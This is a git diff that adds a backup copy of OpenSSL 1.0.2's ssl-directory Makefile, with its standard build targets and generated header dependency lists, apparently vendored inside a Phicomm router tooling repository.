+tls_srp.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+tls_srp.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+tls_srp.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+tls_srp.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+tls_srp.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+tls_srp.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+tls_srp.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+tls_srp.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+tls_srp.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+tls_srp.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+tls_srp.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+tls_srp.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+tls_srp.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+tls_srp.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+tls_srp.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+tls_srp.o: tls_srp.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/Makefile.bak
new file mode 100644
index 0000000..bd4b86b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/Makefile.bak
@@ -0,0 +1,1018 @@
+#
+# OpenSSL/ssl/Makefile
+#
+
+DIR=	ssl
+TOP=	..
+CC=	cc
+INCLUDES= -I../crypto -I$(TOP) -I../include $(KRB5_INCLUDES)
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+# KRB5 stuff
+KRB5_INCLUDES=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README ssl-lib.com install.com
+TEST=ssltest.c heartbeat_test.c
+APPS=
+
+LIB=$(TOP)/libssl.a
+SHARED_LIB= libssl$(SHLIB_EXT)
+LIBSRC=	\
+	s2_meth.c   s2_srvr.c s2_clnt.c  s2_lib.c  s2_enc.c s2_pkt.c \
+	s3_meth.c   s3_srvr.c s3_clnt.c  s3_lib.c  s3_enc.c s3_pkt.c s3_both.c s3_cbc.c \
+	s23_meth.c s23_srvr.c s23_clnt.c s23_lib.c          s23_pkt.c \
+	t1_meth.c   t1_srvr.c t1_clnt.c  t1_lib.c  t1_enc.c t1_ext.c \
+	d1_meth.c   d1_srvr.c d1_clnt.c  d1_lib.c  d1_pkt.c \
+	d1_both.c d1_srtp.c \
+	ssl_lib.c ssl_err2.c ssl_cert.c ssl_sess.c \
+	ssl_ciph.c ssl_stat.c ssl_rsa.c \
+	ssl_asn1.c ssl_txt.c ssl_algs.c ssl_conf.c \
+	bio_ssl.c ssl_err.c kssl.c t1_reneg.c tls_srp.c t1_trce.c ssl_utst.c
+LIBOBJ= \
+	s2_meth.o  s2_srvr.o  s2_clnt.o  s2_lib.o  s2_enc.o s2_pkt.o \
+	s3_meth.o  s3_srvr.o  s3_clnt.o  s3_lib.o  s3_enc.o s3_pkt.o s3_both.o s3_cbc.o \
+	s23_meth.o s23_srvr.o s23_clnt.o s23_lib.o          s23_pkt.o \
+	t1_meth.o   t1_srvr.o t1_clnt.o  t1_lib.o  t1_enc.o t1_ext.o \
+	d1_meth.o   d1_srvr.o d1_clnt.o  d1_lib.o  d1_pkt.o \
+	d1_both.o d1_srtp.o\
+	ssl_lib.o ssl_err2.o ssl_cert.o ssl_sess.o \
+	ssl_ciph.o ssl_stat.o ssl_rsa.o \
+	ssl_asn1.o ssl_txt.o ssl_algs.o ssl_conf.o \
+	bio_ssl.o ssl_err.o kssl.o t1_reneg.o tls_srp.o t1_trce.o ssl_utst.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= ssl.h ssl2.h ssl3.h ssl23.h tls1.h dtls1.h kssl.h srtp.h
+HEADER=	$(EXHEADER) ssl_locl.h kssl_lcl.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ..; $(MAKE) DIRS=$(DIR) all)
+
+all:	shared
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+shared: lib
+	if [ -n "$(SHARED_LIBS)" ]; then \
+		(cd ..; $(MAKE) $(SHARED_LIB)); \
+	fi
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@if [ -z "$(THIS)" ]; then \
+	    $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; \
+	else \
+	    $(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC); \
+	fi
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+bio_ssl.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+bio_ssl.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+bio_ssl.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+bio_ssl.o: ../include/openssl/err.h ../include/openssl/evp.h
+bio_ssl.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+bio_ssl.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+bio_ssl.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+bio_ssl.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+bio_ssl.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+bio_ssl.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+bio_ssl.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+bio_ssl.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+bio_ssl.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+bio_ssl.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+bio_ssl.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+bio_ssl.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h bio_ssl.c
+d1_both.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_both.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+d1_both.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_both.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_both.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_both.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_both.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+d1_both.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+d1_both.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+d1_both.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+d1_both.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+d1_both.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+d1_both.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+d1_both.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+d1_both.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+d1_both.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+d1_both.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+d1_both.o: ../include/openssl/x509_vfy.h d1_both.c ssl_locl.h
+d1_clnt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_clnt.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+d1_clnt.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+d1_clnt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_clnt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_clnt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_clnt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_clnt.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+d1_clnt.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+d1_clnt.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+d1_clnt.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+d1_clnt.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+d1_clnt.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+d1_clnt.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+d1_clnt.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+d1_clnt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+d1_clnt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+d1_clnt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+d1_clnt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h d1_clnt.c
+d1_clnt.o: ssl_locl.h
+d1_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_lib.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+d1_lib.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_lib.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_lib.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_lib.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_lib.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+d1_lib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+d1_lib.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+d1_lib.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+d1_lib.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+d1_lib.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+d1_lib.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+d1_lib.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+d1_lib.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+d1_lib.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+d1_lib.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h d1_lib.c
+d1_lib.o: ssl_locl.h
+d1_meth.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_meth.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+d1_meth.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_meth.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_meth.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_meth.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_meth.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+d1_meth.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+d1_meth.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+d1_meth.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+d1_meth.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+d1_meth.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+d1_meth.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+d1_meth.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+d1_meth.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+d1_meth.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+d1_meth.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h d1_meth.c
+d1_meth.o: ssl_locl.h
+d1_pkt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_pkt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+d1_pkt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_pkt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_pkt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_pkt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_pkt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+d1_pkt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+d1_pkt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+d1_pkt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+d1_pkt.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+d1_pkt.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+d1_pkt.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+d1_pkt.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+d1_pkt.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+d1_pkt.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+d1_pkt.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+d1_pkt.o: ../include/openssl/x509_vfy.h d1_pkt.c ssl_locl.h
+d1_srtp.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_srtp.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+d1_srtp.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_srtp.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_srtp.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_srtp.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_srtp.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+d1_srtp.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+d1_srtp.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+d1_srtp.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+d1_srtp.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+d1_srtp.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+d1_srtp.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+d1_srtp.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+d1_srtp.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+d1_srtp.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+d1_srtp.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h d1_srtp.c
+d1_srtp.o: srtp.h ssl_locl.h
+d1_srvr.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_srvr.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+d1_srvr.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+d1_srvr.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_srvr.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_srvr.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_srvr.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_srvr.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+d1_srvr.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+d1_srvr.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+d1_srvr.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+d1_srvr.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+d1_srvr.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+d1_srvr.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+d1_srvr.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+d1_srvr.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+d1_srvr.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+d1_srvr.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+d1_srvr.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h d1_srvr.c
+d1_srvr.o: ssl_locl.h
+kssl.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+kssl.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+kssl.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+kssl.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+kssl.o: ../include/openssl/krb5_asn.h ../include/openssl/kssl.h
+kssl.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+kssl.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+kssl.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+kssl.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+kssl.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+kssl.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+kssl.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+kssl.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+kssl.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+kssl.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+kssl.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h kssl.c
+kssl.o: kssl_lcl.h
+s23_clnt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s23_clnt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s23_clnt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s23_clnt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s23_clnt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s23_clnt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s23_clnt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s23_clnt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s23_clnt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s23_clnt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s23_clnt.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+s23_clnt.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+s23_clnt.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s23_clnt.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s23_clnt.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s23_clnt.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s23_clnt.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+s23_clnt.o: ../include/openssl/x509_vfy.h s23_clnt.c ssl_locl.h
+s23_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s23_lib.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s23_lib.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s23_lib.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s23_lib.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s23_lib.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s23_lib.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s23_lib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s23_lib.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s23_lib.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s23_lib.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s23_lib.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s23_lib.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s23_lib.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s23_lib.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s23_lib.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s23_lib.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s23_lib.c
+s23_lib.o: ssl_locl.h
+s23_meth.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s23_meth.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s23_meth.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s23_meth.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s23_meth.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s23_meth.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s23_meth.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s23_meth.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s23_meth.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s23_meth.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s23_meth.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s23_meth.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s23_meth.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s23_meth.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s23_meth.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s23_meth.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s23_meth.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s23_meth.c
+s23_meth.o: ssl_locl.h
+s23_pkt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s23_pkt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s23_pkt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s23_pkt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s23_pkt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s23_pkt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s23_pkt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s23_pkt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s23_pkt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s23_pkt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s23_pkt.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s23_pkt.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s23_pkt.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s23_pkt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s23_pkt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s23_pkt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s23_pkt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s23_pkt.c
+s23_pkt.o: ssl_locl.h
+s23_srvr.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s23_srvr.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s23_srvr.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s23_srvr.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s23_srvr.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s23_srvr.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s23_srvr.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s23_srvr.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s23_srvr.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s23_srvr.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s23_srvr.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+s23_srvr.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+s23_srvr.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s23_srvr.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s23_srvr.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s23_srvr.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s23_srvr.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+s23_srvr.o: ../include/openssl/x509_vfy.h s23_srvr.c ssl_locl.h
+s2_clnt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_clnt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_clnt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_clnt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_clnt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_clnt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_clnt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_clnt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_clnt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_clnt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_clnt.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_clnt.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_clnt.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_clnt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_clnt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_clnt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_clnt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_clnt.c
+s2_clnt.o: ssl_locl.h
+s2_enc.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_enc.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_enc.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_enc.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_enc.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_enc.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_enc.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_enc.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_enc.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_enc.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_enc.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_enc.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_enc.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_enc.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_enc.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_enc.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_enc.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_enc.c
+s2_enc.o: ssl_locl.h
+s2_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_lib.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_lib.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_lib.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_lib.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_lib.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_lib.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_lib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_lib.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_lib.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_lib.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_lib.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_lib.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_lib.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_lib.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_lib.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_lib.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_lib.c
+s2_lib.o: ssl_locl.h
+s2_meth.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_meth.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_meth.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_meth.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_meth.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_meth.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_meth.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_meth.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_meth.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_meth.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_meth.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_meth.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_meth.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_meth.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_meth.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_meth.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_meth.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_meth.c
+s2_meth.o: ssl_locl.h
